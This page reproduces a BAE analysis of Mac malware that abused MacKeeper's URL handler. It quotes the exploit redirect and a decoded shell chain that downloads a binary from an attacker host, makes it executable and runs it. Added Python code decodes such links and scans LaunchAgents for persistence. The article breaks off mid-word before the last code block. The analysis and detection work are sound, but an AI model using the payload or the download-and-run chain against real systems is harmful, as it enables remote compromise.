One Article Review

Home - The article:
Source BAE
Identifier 352315
Publication date 2017-03-06 12:14:28 (seen: 2017-03-06 12:14:28)
Title New Mac OS Malware Exploits MacKeeper
Text

Written by Sergei Shevchenko, Cyber Research

Last month a new advisory was published on a vulnerability discovered in MacKeeper, a controversial piece of software created by the Ukrainian company ZeoBIT and now owned by Kromtech Alliance Corp. As discovered by Braden Thomas, the flaw in MacKeeper's URL handler implementation allows arbitrary remote code execution when a user visits a specially crafted web page.

The first reports on this vulnerability suggested that no malicious MacKeeper URLs had yet been spotted in the wild. Not any more: since the proof of concept was published, it took only days for the first instances to appear in the wild.

The attack this post discusses can be carried out via a phishing email containing a malicious URL. Once it is clicked, users running MacKeeper are presented with a dialog claiming they are infected with malware and prompting them for a password to remove it. The real purpose of the prompt is to have the malware run with admin rights.

The web page hosted by the attackers in this particular case has the following format:

    window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/[BASE_64_ENCODED_STUB]';

where [BASE_64_ENCODED_STUB], once decoded, contains the following commands, which MacKeeper interprets and executes using the system shell:

    curl -A 'Safari' -o /Users/Shared/dufh http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;chmod 755 /Users/Shared/dufh;cd /Users/Shared;./dufh

Note that curl is told (with -A) to present a bare "Safari" User-Agent, which is itself a usable network indicator for this download. The launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as "/bin/sh" (the system's POSIX shell), and the prompt message displayed to the user is: "Your computer has malware that needs to be removed".

As a result, once the unsuspecting user clicks the malicious link, the password dialog described above pops up. Once the password is entered, the malware is downloaded, saved as /Users/Shared/dufh, and executed.
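The URL shape above (scheme, fixed selector path, base64 stub carrying a shell command) is enough to write a decoder for triaging links found in mail or proxy logs. The following is an added example, not code from the BAE post or from MacKeeper/ZeoBIT. It assumes the decoded stub is just the shell command string; the post says the stub also carries the launcher path and prompt text, but does not give that serialization, so those fields are not modelled. The sample URL is constructed from the post's command, with the host removed as in the post.

```python
"""Decoder and indicator check for MacKeeper 'com-zeobit-command:' URLs.

Added example (not from the BAE post). Assumption: the base64 stub decodes to
the shell command string alone; launcher path and prompt fields are not modelled.
"""
import base64
import binascii
import re
from urllib.parse import unquote

SCHEME = "com-zeobit-command:"
SELECTOR = "/i/ZBAppController/performActionWithHelperTask:arguments:/"

# Shell patterns that together describe the download-chmod-run chain in the post.
INDICATORS = {
    "download": re.compile(r"\bcurl\b.*\s-o\s+(\S+)"),
    "make_executable": re.compile(r"\bchmod\s+\d{3,4}\s+(\S+)"),
    "run_from_shared": re.compile(r"(?:^|;|\s)\./\S+|/Users/Shared/\S+"),
}


def extract_stub(url: str):
    """Return the raw base64 stub from a com-zeobit-command URL, or None if the
    URL does not target the performActionWithHelperTask selector."""
    if not url.startswith(SCHEME):
        return None
    rest = url[len(SCHEME):].lstrip("/")          # tolerate 1..3 leading slashes
    sel = SELECTOR.lstrip("/")
    if not rest.startswith(sel):
        return None
    return unquote(rest[len(sel):])               # undo any %-encoding of the stub


def decode_stub(stub: str):
    """Base64-decode the stub, tolerating stripped padding; None if not base64."""
    padded = stub + "=" * (-len(stub) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage(url: str) -> dict:
    """Decode the URL's payload and report which indicators matched."""
    stub = extract_stub(url)
    if stub is None:
        return {"handled": False, "command": None, "hits": []}
    cmd = decode_stub(stub)
    if cmd is None:
        return {"handled": True, "command": None, "hits": ["undecodable_stub"]}
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {"handled": True, "command": cmd, "hits": hits}


# Constructed sample modelled on the command quoted in the post.
SAMPLE_CMD = ("curl -A 'Safari' -o /Users/Shared/dufh "
              "http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;"
              "chmod 755 /Users/Shared/dufh;cd /Users/Shared;./dufh")
SAMPLE_URL = SCHEME + "//" + SELECTOR + base64.b64encode(SAMPLE_CMD.encode()).decode()

if __name__ == "__main__":
    result = triage(SAMPLE_URL)
    print("decoded command:", result["command"])
    print("indicators:", result["hits"])
```

Any hit on all three indicators is the exact chain the post describes; a single hit (for example, a plain curl) is worth a look but is not conclusive on its own.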
At this stage, the executable file dufh is a dropper. When run, it dumps an embedded executable and then launches it. The dropper also creates a plist and updates the LaunchAgents so that the created executable auto-starts at login ("RunAtLoad").

Backdoor functionality

The embedded executab
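The persistence step (a LaunchAgents plist with RunAtLoad pointing at a dropped binary) is easy to hunt for on a host. The following is an added example, not code from the BAE post. The post gives neither the plist label nor the dropped executable's name, so the sample plist, its label and its program path are constructed; the check flags the combination of RunAtLoad (or KeepAlive) with a program that lives in a shared or temporary directory.

```python
"""Triage of LaunchAgents plists for the persistence shape described in the post.

Added example (not from the BAE post). The label and program path in the sample
plist are constructed; only the RunAtLoad-plus-shared-directory pattern comes
from the post.
"""
import plistlib
from pathlib import Path
from xml.parsers.expat import ExpatError

# Directories a legitimate agent rarely runs from, but a dropper typically uses.
SUSPECT_DIRS = ("/Users/Shared/", "/tmp/", "/private/tmp/")


def program_path(plist: dict):
    """Return the executable launchd would run: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def assess_launch_agent(data: bytes) -> dict:
    """Parse plist bytes and report the auto-start and location indicators."""
    try:
        plist = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return {"parsed": False, "suspicious": False, "reasons": ["invalid plist"]}
    prog = program_path(plist)
    reasons = []
    if plist.get("RunAtLoad") is True:
        reasons.append("RunAtLoad")
    if plist.get("KeepAlive"):
        reasons.append("KeepAlive")
    if prog and prog.startswith(SUSPECT_DIRS):
        reasons.append(f"program under shared/temp dir: {prog}")
    # Auto-start alone is normal; auto-start from a shared dir is the dropper pattern.
    suspicious = any(r.startswith("program under") for r in reasons) and len(reasons) >= 2
    return {"parsed": True, "label": plist.get("Label"), "program": prog,
            "suspicious": suspicious, "reasons": reasons}


def scan_dir(directory: str) -> list:
    """Assess every *.plist in a LaunchAgents directory (e.g. ~/Library/LaunchAgents)."""
    results = []
    for path in sorted(Path(directory).expanduser().glob("*.plist")):
        result = assess_launch_agent(path.read_bytes())
        result["file"] = str(path)
        results.append(result)
    return results


# Constructed plist modelled on the behaviour the post describes.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.dropped</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/dropped_binary</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed benign agent: auto-starts, but from a system path.
BENIGN_PLIST = plistlib.dumps({"Label": "com.example.ok", "Program": "/usr/bin/true",
                               "RunAtLoad": True})

if __name__ == "__main__":
    for blob in (SAMPLE_PLIST, BENIGN_PLIST):
        print(assess_launch_agent(blob))
```

To run it over a real host, call scan_dir("~/Library/LaunchAgents") and scan_dir("/Library/LaunchAgents") and review the entries with suspicious set.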